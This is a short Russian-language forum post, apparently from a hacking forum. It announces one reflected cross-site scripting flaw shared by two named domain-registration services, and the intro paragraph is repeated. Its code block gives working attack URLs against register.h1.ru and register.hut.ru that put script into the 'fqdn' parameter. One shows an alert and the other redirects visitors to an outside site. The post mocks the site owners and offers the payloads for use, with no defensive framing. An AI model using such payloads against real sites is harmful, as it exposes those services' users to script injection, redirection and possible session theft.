Hut.ru&Holm.ru XSS
2 одинаковые XSS в этих сервисах были обнаружены сегодня. Всмысле бага то одна а сервиса 2. Видать у лохов двиг единый. Вообщем вот суть багов:
2 одинаковые XSS в этих сервисах были обнаружены сегодня. Всмысле бага то одна а сервиса 2. Видать у лохов двиг единый. Вообщем вот суть багов:
Код:
http://register.h1.ru/cgi-bin/sp.cgi?fqdn=
[script]alert("xss.pro/")[/script]
http://register.hut.ru/cgi-bin/sp.cgi?fqdn=
[script]location.replace("http://www.xss.pro/")[/script]